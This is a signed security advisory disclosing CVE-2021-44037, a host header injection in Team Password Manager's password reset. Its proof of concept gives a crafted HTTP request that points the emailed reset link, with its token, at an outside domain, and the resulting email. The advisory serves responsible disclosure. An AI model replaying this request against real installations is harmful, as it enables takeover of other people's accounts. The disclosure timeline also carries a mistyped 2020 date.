-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-060 Product: Team Password Manager Manufacturer: Ferran Barba Affected Version(s): 9.125.225 (released 2021-04-30) Tested Version(s): 9.125.225 (released 2021-04-30) Vulnerability Type: Weak Password Recovery Mechanism for Forgotten Password (CWE-640) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2021-10-28 Solution Date: 2021-11-12 Public Disclosure: 2021-11-30 CVE Reference: CVE-2021-44037 Author of Advisory: Stefan Walter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The manufacturer describes the product as follows (see [1]): "Team Password Manager is a self hosted (also called on-premises) web app that helps companies manage lots of passwords across lots of projects. It's specially designed for teams that need to manage several passwords in each project, that have lots of projects and that each project is shared among several people." Password reset links can be manipulated to point to an attacker-controlled server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The web application allows users to reset their password at /index.php/login/forgot_pwd. If a registered user enters their e-mail address and submits the form, the server sends an e-mail containing a password reset link to that address. The value of the HTTP header "Host" is reflected in that password reset link. This is called "host header injection/poisoning". If the affected user is not careful and clicks on said link, the information needed to set a new password is sent to the malicious server. With that, the attacker can take over the victim's account. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): For this proof of concept, a local instance of Team Password Manager was set up using docker-compose, as described in [2]. "testinstallation" and "example.com" were configured in /etc/hosts as aliases for 127.0.0.1. For testing purposes, a fake SMTP server was started using `python3 -m aiosmtpd -n -l 0.0.0.0:25`. Next, the request for a password reset of the user user@example.com was intercepted in Burp and the host header manually modified from "testinstallation" to "syss.de". The result is shown in the following request (non-essential headers have been removed in the listing): POST /index.php/login/forgot_pwd HTTP/1.1 Host: syss.de Cookie: PHPSESSID=h6kdo2t358piemhr4b3pr20ssh Content-Type: application/x-www-form-urlencoded Content-Length: 85 Origin: https://testinstallation Referer: https://testinstallation/index.php/login/forgot_pwd [...] csrft=fe414bfa1f4cb502c4c5b490be6b0734abfb74af&email=user%40example.com&submit=Submit The resulting e-mail sent by Team Password Manager contains a password reset link pointing to the manipulated domain syss.de: $ python3 -m aiosmtpd -n -l 0.0.0.0:25 ---------- MESSAGE FOLLOWS ---------- User-Agent: Team Password Manager Date: Tue, 26 Oct 2021 11:33:51 +0000 From: "Team Password Manager" Return-Path: To: user@example.com Subject: Team Password Manager: Forgot your =?UTF-8?B?cGFzc3dvcmQ/?= Reply-To: "user@example.com" X-Sender: user@example.com X-Mailer: Team Password Manager X-Priority: 3 (Normal) Message-ID: <6177e79f1909a@example.com> Mime-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 8bit X-Peer: ('172.19.0.3', 33396) This message is sent from your installation of Team Password Manager, on your request to reset your password. Click the following link or copy and paste it on your browser's address bar to reset your password: https://syss.de/index.php/login/reset_pwd/3/61b157d4c4680acc94adc65e1a06afe9ae3facbf/af0e0f1fbeed2df7064c43f150454e6f69ce4a9b ------------ END MESSAGE ------------ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update Team Password Manager to the patched version and correctly configure the password reset link URL under Settings -> Password Reset -> Edit password reset URL. We thank the vendor for quickly responding to our e-mail and providing a solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-10-12: Vulnerability discovered 2021-10-28: Vulnerability reported to manufacturer 2021-11-12: Fixed in release 10.135.236 (see [3]) 2020-11-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Team Password Manager https://teampasswordmanager.com/faq/what-is-teampasswordmanager/ [2] Installation procedure using docker-compose https://teampasswordmanager.com/docs/docker-compose/ [3] Changelog of the fixed version https://teampasswordmanager.com/docs/changelog/#10.135.236 [4] SySS Security Advisory SYSS-2021-060 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-060.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Stefan Walter of SySS GmbH. E-Mail: stefan.walter@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEdN13zQMXJ3dHDTi+vguzEdo/PhYFAmGfNwkACgkQvguzEdo/ PhZ+IRAAlFii/PkYF/4dwKQjNrcE7Dk5whzIdzELu8f494Y2e6zv2Ec3ZBdlC/FZ KSySEhBYz2GE/Og543XiI4UGfKUWjWHeXNvgaF4B0v50gYfwXSYn3OLRUqIoKyDz yhDNNk7ZcvtXjGH2hNGa9yzHAqJ9rH6dsyLvvVbU5KXKCsQoRv6P3PyiPknGoRdu CGflEhaOFyKpJeIgJU03ylQ0wO9nvlesqh9xthAA8LvTOJhizZHVZ44isotsDGUi prM6nTVPIhhN9E8WbkWkvD717T16M7EVdrcQKkxRoHCJ+9GapN3YTw576xWqBGK/ eGcacK0JdGZ5noIjdDU+GXJ8WOEri6jm42/q4fUTfgRXNFiyKTD+jlcNfTV9IaMj 6/KhprGa7rg8+GQsbxSBjmkcjYXTYJ1fHRzDZyssSZrjGPcHE8Ecas6epF9EPU6M SUH9nG/Otc6UlPa/DJIiZQiO8tQdjS0IdOurx5FuwyORa6tDMp3ywY6qIYkE4AJO TPpwMCX3QNaeLEv/aaMdQwGqzQ1QKLmbMP/uR+9CBucotwi6OZtkKDelrLagskqV hMRy5pKJyF8qqITtwkpgQq9dUc+0XGBmPEBP20LN3bJCyd6gDjOFsL963tZVOlyb VHCiR3/sj8dNHRxUXr9evZS6ZRRphF4NYre2vEHWfu+hkAsREec= =1vD1 -----END PGP SIGNATURE-----